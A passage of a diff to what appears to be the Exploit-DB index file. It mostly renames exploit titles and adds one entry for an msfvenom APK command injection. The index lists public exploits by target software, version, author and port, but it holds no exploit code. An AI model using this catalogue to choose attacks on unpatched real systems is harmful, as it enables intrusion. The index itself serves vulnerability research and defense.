 35472,exploits/linux_x86-64/local/35472.txt,"Offset2lib - Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",local,linux_x86-64,
 35488,exploits/osx/local/35488.c,"Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",local,osx,
@@ -10017,7 +10018,7 @@ id,file,description,date,author,type,platform,port
 39791,exploits/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - 'ImageTragick' Delegate Arbitrary Command Execution (Metasploit)",2016-05-09,Metasploit,local,multiple,
 39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",local,windows,
 39804,exploits/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",local,windows,
-39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,local,windows,
+39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032)",2016-04-25,fdiskyou,local,windows,
 39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Overflow",2016-05-13,"Juan Sacco",local,linux,
 39811,exploits/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,local,linux,
 39814,exploits/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows,
@@ -11133,7 +11134,7 @@ id,file,description,date,author,type,platform,port
 48251,exploits/windows/local/48251.txt,"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path",2020-03-25,"Felipe Winsnes",local,windows,
 48253,exploits/windows/local/48253.py,"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)",2020-03-25,"Felipe Winsnes",local,windows,
 48257,exploits/windows/local/48257.py,"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)",2020-03-27,"Felipe Winsnes",local,windows,
-48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)",2020-03-30,Hodorsec,local,windows,
+48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH) (ROP)",2020-03-30,Hodorsec,local,windows,
 48267,exploits/windows/local/48267.txt,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation",2020-03-30,"Daniel García Gutiérrez",local,windows,
 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
@@ -11143,7 +11144,7 @@ id,file,description,date,author,type,platform,port
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
 48314,exploits/windows_x86/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows_x86,
-48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
+48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + EggHunter)",2020-04-14,"Andy Bowden",local,windows,
 48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
 48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
 48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
@@ -11179,7 +11180,7 @@ id,file,description,date,author,type,platform,port
 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
 48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,
 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
-48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
+48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH) (ASLR + DEP Bypass)",2020-06-10,boku,local,windows,
 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
@@ -11245,6 +11246,7 @@ id,file,description,date,author,type,platform,port
 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
 49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows,
 49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",2021-01-22,LiquidWorm,local,windows,
+49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -11713,9 +11715,9 @@ id,file,description,date,author,type,platform,port
 1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)",2006-06-15,c0rrupt,remote,windows,
 1940,exploits/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",remote,windows,445
 1965,exploits/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,remote,windows,445
-1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,remote,multiple,10000
+1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure",2006-07-09,joffer,remote,multiple,10000
 2014,exploits/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow",2006-07-15,"Pablo Isola",remote,windows,515
-2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,remote,multiple,10000
+2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure",2006-07-15,UmZ,remote,multiple,10000
 2034,exploits/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",remote,hardware,
 2047,exploits/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",remote,windows,
 2048,exploits/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution",2006-07-20,"Jon Hart",remote,hardware,
@@ -11755,7 +11757,7 @@ id,file,description,date,author,type,platform,port
 2403,exploits/windows/remote/2403.c,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow",2006-09-20,nop,remote,windows,
 2408,exploits/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - 'VML' Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",remote,windows,
 2425,exploits/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow",2006-09-24,jamikazu,remote,windows,
-2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",remote,windows,
+2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2)",2006-09-25,"Trirat Puttaraksa",remote,windows,
 2440,exploits/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",remote,windows,
 2445,exploits/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow",2006-09-27,h07,remote,windows,80
 2448,exploits/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (HTML)",2006-09-28,jamikazu,remote,windows,
@@ -11785,7 +11787,7 @@ id,file,description,date,author,type,platform,port
 2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows,
 2789,exploits/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,remote,windows,
 2800,exploits/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",remote,windows,
-2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",remote,windows,445
+2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070)",2006-11-18,"Winny Thomas",remote,windows,445
 2837,exploits/multiple/remote/2837.sql,"Oracle 9i/10g - 'read/write/execute' ation Suite",2006-11-23,"Marco Ivaldi",remote,multiple,
 2856,exploits/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",remote,linux,21
 2858,exploits/linux/remote/2858.c,"Evince Document Viewer - 'DocumentMedia' Remote Buffer Overflow",2006-11-28,K-sPecial,remote,linux,
@@ -11852,7 +11854,7 @@ id,file,description,date,author,type,platform,port
 3378,exploits/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)",2007-02-26,bunker,remote,multiple,
 3380,exploits/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Directory Traversal",2007-02-27,"Sergey Gordeychik",remote,windows,
 3381,exploits/windows/remote/3381.pl,"NetProxy 4.03 - Web Filter Evasion / Bypass Logging",2007-02-27,"Craig Heffner",remote,windows,
-3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)",2007-02-28,"Umesh Wanve",remote,windows,69
+3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode",2007-02-28,"Umesh Wanve",remote,windows,69
 3389,exploits/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",remote,linux,
 3391,exploits/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",remote,windows,
 3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow",2007-03-01,cybermind,remote,windows,
@@ -11864,8 +11866,8 @@ id,file,description,date,author,type,platform,port
 3452,exploits/multiple/remote/3452.php,"PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass",2007-03-10,"Stefan Esser",remote,multiple,
 3462,exploits/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (1)",2007-03-12,Marsu,remote,windows,
 3463,exploits/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (2)",2007-03-12,Marsu,remote,windows,
-3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",remote,windows,21
-3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",remote,windows,21
+3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow",2007-03-14,"Winny Thomas",remote,windows,21
+3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow",2007-03-15,"Umesh Wanve",remote,windows,21
 3491,exploits/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution",2007-03-15,"Core Security",remote,bsd,
 3495,exploits/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",remote,windows,6503
 3531,exploits/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",remote,windows,554
@@ -12089,7 +12091,7 @@ id,file,description,date,author,type,platform,port
 4745,exploits/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,remote,windows,
 4746,exploits/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,remote,windows,
 4747,exploits/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,remote,windows,
-4754,exploits/windows_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",remote,windows_x86,3128
+4754,exploits/windows_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow",2007-12-18,"Marcin Kozlowski",remote,windows_x86,3128
 4760,exploits/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)",2007-12-21,"Andres Tarasco",remote,windows,
 4761,exploits/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,remote,multiple,25
 4784,exploits/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",remote,windows,80
@@ -12196,12 +12198,12 @@ id,file,description,date,author,type,platform,port
 5563,exploits/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,remote,windows,69
 5612,exploits/windows/remote/5612.html,"idautomation bar code - ActiveX Multiple Vulnerabilities",2008-05-14,shinnai,remote,windows,
 5619,exploits/windows/remote/5619.html,"Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting",2008-05-14,"Aviv Raff",remote,windows,
-5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)",2008-05-15,"Markus Mueller",remote,linux,22
+5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH",2008-05-15,"Markus Mueller",remote,linux,22
 5632,exploits/linux/remote/5632.rb,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)",2008-05-16,L4teral,remote,linux,22
 5681,exploits/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,remote,windows,
 5694,exploits/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,623
 5695,exploits/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,8800
-5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Python)",2008-06-01,"WarCat team",remote,linux,22
+5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH",2008-06-01,"WarCat team",remote,linux,22
 5732,exploits/windows/remote/5732.html,"C6 Messenger - ActiveX Remote Download and Execute",2008-06-03,Nine:Situations:Group,remote,windows,
 5738,exploits/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,remote,windows,1100
 5741,exploits/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download",2008-06-04,cocoruder,remote,windows,
@@ -12219,15 +12221,15 @@ id,file,description,date,author,type,platform,port
 6004,exploits/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",remote,windows,
 6012,exploits/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,remote,windows,80
 6013,exploits/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,remote,osx,
-6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,remote,linux,80
+6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution",2008-07-12,muts,remote,linux,80
 6089,exploits/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,remote,windows,80
 6094,exploits/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation",2008-07-17,eliteboy,remote,linux,
 6100,exploits/windows_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,remote,windows_x86,80
 6116,exploits/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",remote,windows,
 6118,exploits/windows/remote/6118.pl,"IntelliTamper 2.07 - server header Remote Code Execution",2008-07-22,Koshi,remote,windows,
-6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,remote,windows,
+6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-23,r0ut3r,remote,windows,
 6122,exploits/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)",2008-07-23,I)ruid,remote,multiple,
-6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning (Python)",2008-07-24,"Julien Desfossez",remote,multiple,
+6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-24,"Julien Desfossez",remote,multiple,
 6124,exploits/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download",2008-07-24,callAX,remote,windows,
 6130,exploits/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-25,"Marc Bevand",remote,multiple,
 6151,exploits/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,remote,windows,
@@ -12374,7 +12376,7 @@ id,file,description,date,author,type,platform,port
 8041,exploits/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",remote,windows,
 8059,exploits/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption",2009-02-16,Nine:Situations:Group,remote,windows,
 8079,exploits/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,remote,windows,
-8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",remote,windows,
+8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-02-20,"David Kennedy (ReL1K)",remote,windows,
 8082,exploits/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)",2009-02-20,webDEViL,remote,windows,
 8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",remote,hardware,
 8097,exploits/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",remote,multiple,
@@ -12385,7 +12387,7 @@ id,file,description,date,author,type,platform,port
 8144,exploits/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,remote,windows,
 8149,exploits/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,remote,windows,
 8152,exploits/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",remote,windows,
-8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,remote,windows,80
+8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow",2009-03-04,Dr4sH,remote,windows,80
 8155,exploits/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,remote,windows,
 8160,exploits/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,remote,windows,
 8173,exploits/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,remote,windows,
@@ -12454,7 +12456,7 @@ id,file,description,date,author,type,platform,port
 8754,exploits/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",remote,windows,
 8757,exploits/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows,
 8758,exploits/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows,
-8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)",2009-05-22,racle,remote,windows,
+8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass",2009-05-22,racle,remote,windows,
 8786,exploits/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,remote,multiple,
 8804,exploits/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow (SEH)",2009-05-26,His0k4,remote,windows,2242
 8806,exploits/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)",2009-05-26,ka0x,remote,windows,
@@ -12660,7 +12662,7 @@ id,file,description,date,author,type,platform,port
 10973,exploits/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,remote,windows,
 10980,exploits/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,remote,linux,
 11022,exploits/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",remote,novell,
-11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,remote,windows,
+11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow",2010-01-06,jacky,remote,windows,
 11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",remote,windows,
 11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,remote,windows,
 11151,exploits/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x & D3V!L FUCKER",remote,windows,
@@ -17266,7 +17268,7 @@ id,file,description,date,author,type,platform,port
 37400,exploits/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",remote,windows,
 37429,exploits/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - '/aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",remote,hardware,
 37405,exploits/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,remote,hardware,
-37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python)",2015-06-29,"Ben Lincoln",remote,cgi,
+37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection",2015-06-29,"Ben Lincoln",remote,cgi,
 37428,exploits/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",remote,cgi,
 37564,exploits/hardware/remote/37564.txt,"Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",remote,hardware,
 37448,exploits/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption (Metasploit)",2015-06-30,Metasploit,remote,multiple,
@@ -18400,8 +18402,8 @@ id,file,description,date,author,type,platform,port
 737,exploits/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,webapps,php,
 740,exploits/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",webapps,php,
 754,exploits/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,webapps,php,
-772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C)",2005-01-25,THUNDER,webapps,cgi,
-773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl)",2005-01-25,GHC,webapps,cgi,
+772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution",2005-01-25,THUNDER,webapps,cgi,
+773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution",2005-01-25,GHC,webapps,cgi,
 774,exploits/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",webapps,php,
 786,exploits/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,webapps,php,
 790,exploits/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,webapps,cgi,
@@ -18430,7 +18432,7 @@ id,file,description,date,author,type,platform,port
 881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,webapps,php,
 889,exploits/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,webapps,php,
 892,exploits/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,webapps,php,
-897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,webapps,php,
+897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-24,str0ke,webapps,php,
 901,exploits/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,webapps,php,
 907,exploits/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Get Hash",2005-04-02,CereBrums,webapps,php,
 910,exploits/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Get Hash",2005-04-04,CereBrums,webapps,php,
@@ -18450,13 +18452,13 @@ id,file,description,date,author,type,platform,port
